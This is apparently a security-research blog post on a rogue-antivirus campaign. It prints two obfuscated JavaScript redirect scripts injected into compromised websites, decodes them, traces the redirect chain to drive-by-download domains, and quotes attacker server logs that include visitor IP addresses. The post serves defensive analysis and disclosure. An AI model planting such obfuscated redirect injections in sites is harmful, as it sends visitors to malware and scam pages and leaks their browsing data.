The Finjan's Malicious Code Research Center has made a nice report
about the business with rogue antivirus software
(redirecting visitors from legitimate Web sites). Zdnet Article
The article can be found in the latest Cybercrime Intelligence Report
I just want to show you some script added on legit websites and the log
we've found on the criminal web server.
Note that for each site on this blog like goscanfuse.com, scan6lite.com,
scan7new.com, every domain is listed in the Google API "Safe Browsing"
and each of them reveal a lot of information.
eg. the number on domain used (compromised) and other in conjunctions.
We start by a Google Safe Browsing Diagnostic for: scanline6.com
Report here
Screenshot below (if the report is updated)
Now the Google Safe Browsing Diagnostic for three compromised websites
alfredomcmillanji.awardspace.info
members.lycos.co.uk/cvhkc8xhv/ |
Malicious script inserted. (after the body)
<script>
eval(unescape('\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%6C\
%6F\%63\%61\%74\%69\%6F\%6E\%3D\%22\%68\%74\%74\%70\%3A\%2F
\%2F\%6F\%6E\%6C\%79\%66\%69\%6E\%64\%2E\%6E\%65\%74\%2F\%69\
%6E\%2E\%63\%67\%69\%3F\%33\%26\%67\%72\%6F\%75\%70\%3D\%31\
%31\%26\%70\%61\%72\%61\%6D\%65\%74\%65\%72\%3D\%6F\%72\%74\
%68\%6F\%70\%65\%64\%69\%63\%2B\%70\%68\%79\%73\%69\%63\%61\
%6C\%2B\%65\%78\%61\%6D\%69\%6E\%61\%74\%69\%6F\%6E\%22\%3B'))
</script> |
Which force the browser to be redirected to a traffic management server
document.location="http://onlyfind.net/in.cgi?3&group=11&
parameter=orthopedic+physical+examination"; |
Result here
then redirect to a domain (drive-by-download) which chose the next redirection
| onlyfind.net to "goscandata.com" to "scanany6.com" |
Note: the domain (drive-by-download) redirect to a new site every day.
On April 6: scanany6.com - Redirection Analysis
On April 7: scan7live.com - Redirection Analysis
On April 8: google.com
On April 9: lite6scan.com - Redirection Analysis
Let's show the second domain:
Malicious script inserted. (after the body)
<script language="JavaScript">
eval(unescape('%70%61%72%65%6E%74%
2E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%
2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%
2F%64%64%6F%72%73%2E%69%6E%66%6F%2F%69%6E%2E%63%
67%69%3F%31%31%26%6B%65%79%77%6F%72%64%3D%67%61%
72%61%67%65%62%61%6E%64%2B%68%61%72%64%2B%72%6F%
63%6B%2B%67%75%69%74%61%72%2B%61%70%70%6C%65%2B%
6C%6F%6F%70%73%26%73%65%6F%72%65%66%3D%22%2B%65%
6E%63%6F%64%65%55%52%49%43%6F%6D%70%6F%6E%65%6E%
74%28%64%6F%63%75%6D%65%6E%74%2E%72%65%66%65%72%
72%65%72%29%2B%22%26%22%2B%22%70%61%72%61%6D%65%
74%65%72%3D%24%6B%65%79%77%6F%72%64%26%6B%65%79%
77%6F%72%64%3D%24%6B%65%79%77%6F%72%64%26%73%65%
3D%24%73%65%26%75%72%3D%31%26%48%54%54%50%5F%52%
45%46%45%52%45%52%3D%22%2B%65%6E%63%6F%64%65%55%
52%49%43%6F%6D%70%6F%6E%65%6E%74%28%64%6F%63%75%
6D%65%6E%74%2E%55%52%4C%29%29'))
</script> |
then force the browser to be redirected to another traffic management server
parent.window.location.replace("http://ddors.info/in.cgi?11&keyword=
garageband+hard+rock+guitar+apple+loops&seoref="
+encodeURIComponent(document.referrer)+"&"+
"parameter=$keyword&keyword=$keyword&se=$se&ur=1
&HTTP_REFERER="+encodeURIComponent(document.URL)) |
Result here
then redirect to a domain (drive-by-download) which chose the next redirection
| ddors.info to "goscandata.com" to "scanany6.com" |
Note that during the redirection the "traffic management server" is informed of your IP,
the site which served for redirection "the compromised website".
Interesting is that the site serving for the first redirection is cited in Malware Domain List
since May 2008! for hosting a zlob variant.
*******
What we've found on the server is that:
1 1 0 0 0 0 0 0 US en-us 65.55.165.94 http%3A%2F%2Ftiti%2Eiax%
2Ebe%2Fdiagnostic%2Dteaching%2Dof%2Dreading%2Dand%2Djour
nal%2Darticles%2Ehtml%3Ffeed%3Dcomments%2Drss2 articles live%
2Ecom Mozilla%2F4%2E0+%28compatible%3B+MSIE+6%2E0%3B+
Windows+NT+5%2E2%3B1 1 0 0 1 1 1 0 GB en-gb 86.147.111.244
http%3A%2F%2Fhome%2Eno%2Fchuka%2Fwicapeadea%2Ehtml
wickapeadea yahoo Mozilla%2F4%2E0+%28compatible%3B+
MSIE+7%2E0%3B+Windows+NT+5%2E1%3B1 1 0 0 1 1 1 0 US
en-us 72.11.87.126 http%3A%2F%2Ftiti%2Eiax%2Ebe%2Faia%
2Dbilling%2Dform%2Ehtml aia+billing+form msn Mozilla%2F4%2E0
+%28compatible%3B+MSIE+7%2E0%3B+Windows+NT+5%2E1%3B
|
The visitor IP (country), browser version/language and the site you are coming from which is the compromised website.
I will not published the entire log because a LOT of compromised web site is cited.
(We also have logs from other server - in MB which include thousand of compromised website.)
This is some of them:
1 1 0 0 0 0 0 0
US en-us 65.55.165.94
hxxp://titi.iax.be/diagnostic-teaching-of-reading-and-journal-articles.html?feed=comments-rss2
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2;)
Redirection Analysis
1 1 0 0 1 1 1 0
GB en-gb 86.147.111.244
hxxp://home.no/chuka/wicapeadea.html
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
Redirection Analysis
1 1 0 0 1 1 1 0
US en-us 72.11.87.126
hxxp://titi.iax.be/aia-billing-form.html
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;)
Redirection Analysis
4 1 1 0 0 0 0 0
FR en-us 193.47.80.77
hxxp://mitglied.lycos.de/gbk6ntkbn/usda-maps-mn.html
keyword for traffic: usda maps mn
Redirection Analysis
4 1 1 0 0 0 0 0 US
en-us 204.62.53.124
hxxp://members.lycos.co.uk/dkd1nfkdf/voodoo-glow-skulls-guitar-tabs.html
keyword for traffic: voodoo glow skulls guitar tabs
Redirection Analysis
4 1 0 0 0 0 0 0 IE
en-us 78.137.163.133
hxxp://usuarios.lycos.es/utrinopok/remove-hair-dye-stains.html
keyword for traffic: remove hair dye stains
Redirection Analysis
4 1 0 0 1 1 1 0 US
en-us 71.235.179.148
http://members.lycos.nl/eu40wyhk/presentation-tools-for-excel-highlighting.html
keyword for traffic: presentation tools for excel highlighting
Redirection Analysis
|
| 
Active attacks: LATEST ADDITIONS